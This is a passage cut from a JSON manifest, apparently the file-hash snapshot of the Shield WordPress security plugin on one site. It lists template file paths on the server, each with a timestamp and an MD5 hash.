\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/override-forceoff.php\":{\"d\":1567917025,\"h\":\"d7cf7d0a2672e8311703fd75a53d374e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/visitor-whitelisted.php\":{\"d\":1567917025,\"h\":\"46aa905a5a3bbb34088ba852a5ea9c0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/admin-users-restricted.php\":{\"d\":1567917025,\"h\":\"d788f6066d3358b551108693bd908f67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/plugin-update-available.php\":{\"d\":1567917025,\"h\":\"426441fff1e1ded929b8e44c7e4a5f0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/plugin-failed-to-load.php\":{\"d\":1567917025,\"h\":\"681271fc4f7f5924395ebec005305658\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/wizard_welcome.php\":{\"d\":1567917025,\"h\":\"904d79fc5650a2996d6c1148bca7acd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/plugin-mailing-list-signup.php\":{\"d\":1567917025,\"h\":\"385f90cd320559e42f146f8a2ebf34a5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/certain-options-restricted.php\":{\"d\":1567917025,\"h\":\"a7e770a7baeb1dd2a3b0553645ebf142\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/does-not-meet-requirements.php\":{\"d\":1567917025,\"h\":\"76d9363c3290dcea22a5b43396b3b1c5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/akismet-running.php\":{\"d\":1567917025,\"h\":\"bed960e8ba97b22bbd3198cc4e847b40\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/translate-plugin.php\":{\"d\":1567917025,\"h\":\"1cd4b46fd56417d762713b48fa63cc42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/admin-notice-template.php\":{\"d\":1567917025,\"h\":\"231215bef5ba7319dabec9707e6feff1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/rate-plugin.php\":{\"d\":1567917025,\"h\":\"6cc118564390861e56109b2d68bf86e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/notices\\/allow-tracking.php\":{\"d\":1567917025,\"h\":\"119385e603bf49ce6a0cc0d1ead46dda\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/widgets\\/icwp_widgets.php\":{\"d\":1567917025,\"h\":\"a2d52b5560da14a3efac82e1bc482ba6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/page\\/login_intent.php\":{\"d\":1567917025,\"h\":\"1c91b2bad5a3d14e1ef5e6d31e98d630\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/page\\/base_page.php\":{\"d\":1567917025,\"h\":\"b7e1b51bb2845ad2e03ec1403b5250ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-comments_filter.php\":{\"d\":1567917025,\"h\":\"8f15219316968fcc52a3b4b156cddcfc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/plugin_badge_widget.php\":{\"d\":1567917025,\"h\":\"eebb668318abde21fd832e3c0cffff58\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/user_profile_googleauthenticator.php\":{\"d\":1567917025,\"h\":\"b2bc914d6b4acc2c359bdaf756800c83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-wizard-template.php\":{\"d\":1567917025,\"h\":\"16927d44d35ee23a48c4d5d650701bb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/admin_access_login.php\":{\"d\":1567917025,\"h\":\"3ddb8bfaa55fdeeb749533adad1ab848\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/widget_iframe_side.php\":{\"d\":1567917025,\"h\":\"19fbfab9b45cb34308080f3dabd6c0af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/plugin_badge.php\":{\"d\":1567917025,\"h\":\"86fbc6fa7d8479577787ed430e14c58c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/plugin-vulnerability.php\":{\"d\":1567917025,\"h\":\"0711dc92f11926384b875e5cc0f485c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/google_recaptcha_js.php\":{\"d\":1567917025,\"h\":\"717d8d68b1a3e9e16f41c7e015c0b02f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/widget_dashboard_statistics.php\":{\"d\":1567917025,\"h\":\"832aca80d387d53ae030057faeaac5c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/plugin-deactivate-survey.php\":{\"d\":1567917025,\"h\":\"e5e7452edbad19c2f0718760c349837f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-lockdown.php\":{\"d\":1567917025,\"h\":\"6649a0bc45b7ff3d0b9f2b156086f207\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-actions-template.php\":{\"d\":1567917025,\"h\":\"4277663e3499567c2beca90ac17d04cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/user_profile_emailauthentication.php\":{\"d\":1567917025,\"h\":\"ac188a74bb4eac40472bfffa2645066b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/user_profile_yubikey.php\":{\"d\":1567917025,\"h\":\"fc8ce716b343c8f537362bd259bfb111\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-audit_trail.php\":{\"d\":1567917025,\"h\":\"3f3baca3997d67e75f23a7293265ad25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/summary_single.php\":{\"d\":1567917025,\"h\":\"591da4e730fcdd8f71a9519d83cb3558\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/hg-plugins-reinstall-dialogs.php\":{\"d\":1567917025,\"h\":\"8d4b74a3aac4319ae88cb114eb206e7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-admin_access_restriction.php\":{\"d\":1567917025,\"h\":\"6862e348adbffc6c42e7334028b7a0b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/widget_dashboard_plugin.php\":{\"d\":1567917025,\"h\":\"a9f2a366a645ded2fd33e0e92ffa6252\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-autoupdates.php\":{\"d\":1567917025,\"h\":\"0e09645a2d58b4f4d3b467b69e8aa7bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-hack_protect.php\":{\"d\":1567917025,\"h\":\"591e54a5cd5e2478ad01f311acd17640\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-plugin.php\":{\"d\":1567917025,\"h\":\"8c411fc66049676de375cc0dc100e2de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/options_form.php\":{\"d\":1567917025,\"h\":\"351ae4a38c3311897ea9c11165d740ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-ips.php\":{\"d\":1567917025,\"h\":\"25cdfda101de71e7a34a1ba2846c7f6c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-firewall.php\":{\"d\":1567917025,\"h\":\"1fe74d623c3022bbbc5a79ed88fc26b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-traffic.php\":{\"d\":1567917025,\"h\":\"314a119ffe0582bd692b97b439a1ccb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/pro.php\":{\"d\":1567917025,\"h\":\"6ec3c91adebf3b1a80165844c9fce693\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/gasp_js.php\":{\"d\":1567917025,\"h\":\"84adf18dcffc16d6ad831c5baeb202cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-user_management.php\":{\"d\":1567917025,\"h\":\"2a175383b9f05a9ae38c70a6e3afe9dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/user_profile_backupcode.php\":{\"d\":1567917025,\"h\":\"bd8737d471b7684e5ef04f24f7c3026e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-headers.php\":{\"d\":1567917025,\"h\":\"7a6dc08010d305ac574e73415dcf172d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/admin_access_login_box.php\":{\"d\":1567917025,\"h\":\"be3d7521b46ecbad6582152f665b8f42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-login_protect.php\":{\"d\":1567917025,\"h\":\"030ebea444b23b881300cffeeeadba1c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/snippets\\/module-help-template.php\":{\"d\":1567917025,\"h\":\"36b345dc86ef47b86183e1a9d0aad42c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/index_header.php\":{\"d\":1567917025,\"h\":\"9070f6fa88ba96c59ac4ea971dae9c76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/subfeature-statistics_data_viewer.php\":{\"d\":1567917025,\"h\":\"92c1f331698bfc1b7ea33df5ad5ae292\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/index.php\":{\"d\":1567917025,\"h\":\"cee1d069a444f643fd3806ca1e223387\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/index_footer.php\":{\"d\":1567917025,\"h\":\"800f687e343ae205f51ec71837dd7119\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/access_restricted.php\":{\"d\":1567917025,\"h\":\"5ce6d4920fa5656e041bbf8235af393f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/admin_bootstrap.php\":{\"d\":1567917025,\"h\":\"0337696cd231c31b0bfc2e01b4c91b5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/feature-default.php\":{\"d\":1567917025,\"h\":\"0bb62a4805330731f677d51be2992985\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/php\\/index_body.php\":{\"d\":1567917025,\"h\":\"f6ef6f13785da41783699320940b8e4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/pages\\/base.twig\":{\"d\":1567917025,\"h\":\"dc9b69d7f1ac2606e22566e455b8af08\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/translate-plugin.twig\":{\"d\":1567917025,\"h\":\"fd226ad37135c08813e832b1358eeca6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/akismet-running.twig\":{\"d\":1567917025,\"h\":\"42687f3b0417e64ac1c765365be9d126\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/base-info.twig\":{\"d\":1567917025,\"h\":\"148e277fa53d948da1389469a92e156b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/flash-message.twig\":{\"d\":1567917025,\"h\":\"59bacfac03ea1d284abc9c07ad1d077a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/allow-tracking.twig\":{\"d\":1567917025,\"h\":\"be7ad6ec81fbf59d7ea4bba117950abf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/rate-plugin.twig\":{\"d\":1567917025,\"h\":\"4a3c0fe23df400a03aee6a828593b548\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/base-success.twig\":{\"d\":1567917025,\"h\":\"62d89b857cdd2140a4d0c66634f64e6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/plugin_updated.twig\":{\"d\":1567917025,\"h\":\"fa4d3127ef6e4511be7342b9cbce22cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/certain-options-restricted.twig\":{\"d\":1567917025,\"h\":\"c83f3b3adc99b6647cb5ef9de20f90fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/plugin-mailing-list-signup.twig\":{\"d\":1567917025,\"h\":\"45c0e7641e21915b45bbbaf341ab8e7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/plugin-update-available.twig\":{\"d\":1567917025,\"h\":\"b2d4e57ac0688d586f2b594d03af35fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/does-not-meet-requirements.twig\":{\"d\":1567917025,\"h\":\"6b38addc4aada92cdeeee139e4c82c0f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/override-forceoff.twig\":{\"d\":1567917025,\"h\":\"5965e43d93c0cb6b1c3d7967a0d721dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/email-verification-sent.twig\":{\"d\":1567917025,\"h\":\"66640f815db13ef43f42ec0118656f2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/wizard_welcome.twig\":{\"d\":1567917025,\"h\":\"51ee71c6d1471aa61527cc14f79ffb9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/base.twig\":{\"d\":1567917025,\"h\":\"2cd10a1fe477b1f1586c33492a0af4e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/base-error.twig\":{\"d\":1567917025,\"h\":\"2b2901a99c9576894c121230dd99be11\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/visitor-whitelisted.twig\":{\"d\":1567917025,\"h\":\"bb517bf2cca6637f9f7fddcf596aa35f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/notices\\/admin-users-restricted.twig\":{\"d\":1567917025,\"h\":\"8676dac01dd9effe014fbecd6ec45c84\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/features\\/feature-base.twig\":{\"d\":1567917025,\"h\":\"686b469b262c6bedc28c4a7c5e4a7c90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/features\\/feature-user_management.twig\":{\"d\":1567917025,\"h\":\"3ae010154df1bd4bb64509b63e95ab34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/features\\/feature-default.twig\":{\"d\":1567917025,\"h\":\"2ead36f6b6024d25fa210dba86f704e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/features\\/subfeature-access_restricted.twig\":{\"d\":1567917025,\"h\":\"2a31b999b3eda4a316d108997a34e493\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/features\\/subfeature-audit_trail_viewer.twig\":{\"d\":1567917025,\"h\":\"e4d9631ba077f691c09191bc4cd8502e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/common\\/macros.twig\":{\"d\":1567917025,\"h\":\"c9f0b85b1d43257ea589fc9106308baf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/user\\/profile\\/suspend.twig\":{\"d\":1567917025,\"h\":\"b946da085e46b9250b977c07bcce6f54\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/dialog_plugins_reinstall.twig\":{\"d\":1567917025,\"h\":\"b70e68c6f187868c7f066908502f882b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/optin_form_activecampaign.twig\":{\"d\":1567917025,\"h\":\"b7cb632691d7eee70b82ca31408f02fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/user_sessions.twig\":{\"d\":1567917025,\"h\":\"c785293f0e181e986da7e3e160b60fd4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/optin_form_drip_vertical.twig\":{\"d\":1567917025,\"h\":\"6cb3408f916c7f2cd7af835361b3fbf1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/optin_form_drip.twig\":{\"d\":1567917025,\"h\":\"897b62686d08dbf8c19d6ebb6c530f90\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/comment_form_botbox.twig\":{\"d\":1567917025,\"h\":\"dff53104b5551702b3e9a77c975f5570\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/blacklist_die.twig\":{\"d\":1567917025,\"h\":\"582b08cd074ba472b3517ab3b59d8f49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/privacy_policy.twig\":{\"d\":1567917025,\"h\":\"df2dd80bf1c6b0be91efa3315e9b0e6b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/optin_form_mailchimp.twig\":{\"d\":1567917025,\"h\":\"14c8bc7d24071f438c6a4532c073d728\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/options_form.twig\":{\"d\":1567917025,\"h\":\"a11f984d814b85ab26e5b89203bddb8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/toaster.twig\":{\"d\":1567917025,\"h\":\"afd4c438c13f932c3982e0f206770d7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/widget_sidebar.twig\":{\"d\":1567917025,\"h\":\"2e3b3c29c99473eb8a809ef5b2344c57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/optin_form_drip_inline.twig\":{\"d\":1567917025,\"h\":\"cbd3bc2ee78f2df7d9b933a6b90d35b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/plugin_badge_widget.twig\":{\"d\":1567917025,\"h\":\"839bda2f09a2acc8293aac6b4fa4eb09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/snippets\\/widget_options_footer.twig\":{\"d\":1567917025,\"h\":\"6ddf1107410d3afc3b4a8682512a1230\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/pages\\/landing.twig\":{\"d\":1567917025,\"h\":\"4fee8ac5ba25e4f934ea5ecb758a89ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/pages\\/wizard.twig\":{\"d\":1567917025,\"h\":\"f3c2794eccb3ca5e2345fb34ac4ee662\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/pages\\/base.twig\":{\"d\":1567917025,\"h\":\"1e885f7273a5773f3c6dbfed3b855694\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/import.twig\":{\"d\":1567917025,\"h\":\"782b0ec8ca11a0447ebbc8f161d635b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/admin_access_restriction.twig\":{\"d\":1567917025,\"h\":\"97b4cf00f04484313199153b519207ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/thankyou.twig\":{\"d\":1567917025,\"h\":\"8e3b4d1f79a452749e9dfe72b4693167\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/optin.twig\":{\"d\":1567917025,\"h\":\"7751f0fa603c607ee06a12678e31c3b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/audit_trail.twig\":{\"d\":1567917025,\"h\":\"a488892bef3beb6107c2c7b2b7fde14a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/ip_detect.twig\":{\"d\":1567917025,\"h\":\"61c6e14bdffd0e360e1ab891ab78846f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/welcome.twig\":{\"d\":1567917025,\"h\":\"f1ac362de825fc976f02cb86e8cb1e4d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/how_shield_works.twig\":{\"d\":1567917025,\"h\":\"11102c16cabb7d380813dfcc9fed6449\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/ips.twig\":{\"d\":1567917025,\"h\":\"86412aca8376d62afdef3ab76cade60b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/comments_filter.twig\":{\"d\":1567917025,\"h\":\"b45d0b8128054ef1a75855ec490af9e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/login_protect.twig\":{\"d\":1567917025,\"h\":\"4fcf30350ca95a4ad8ae738b64644116\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/welcome\\/license.twig\":{\"d\":1567917025,\"h\":\"89aa90fd81189911d75292663d55ab00\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/wcf\\/config.twig\":{\"d\":1567917025,\"h\":\"6e3c38ede132d69bbea4363804429890\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/wcf\\/start.twig\":{\"d\":1567917025,\"h\":\"f7c7bb2dc23571be0d7f632d4b07cc46\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/wcf\\/finished.twig\":{\"d\":1567917025,\"h\":\"51e36551919130f543a0ca9dec98636e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/wcf\\/scanresult.twig\":{\"d\":1567917025,\"h\":\"6dc34d203fd38ab2ea0a8f06ebd4c419\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ptg\\/config.twig\":{\"d\":1567917025,\"h\":\"f1444accd887f902f177b0268b940a82\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ptg\\/scanresult_base.twig\":{\"d\":1567917025,\"h\":\"00d1af432fdb7adfbbf3d4883ff25a69\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ptg\\/scanresult_themes.twig\":{\"d\":1567917025,\"h\":\"c829dbac182804b4131c22461562c7b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templates\\/twig\\/wizard\\/slides\\/ptg\\/start.twig\":{\"d\":1567917025,\"h\":\"03313de90f9bb0a5c76dfc2ef138794a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/templa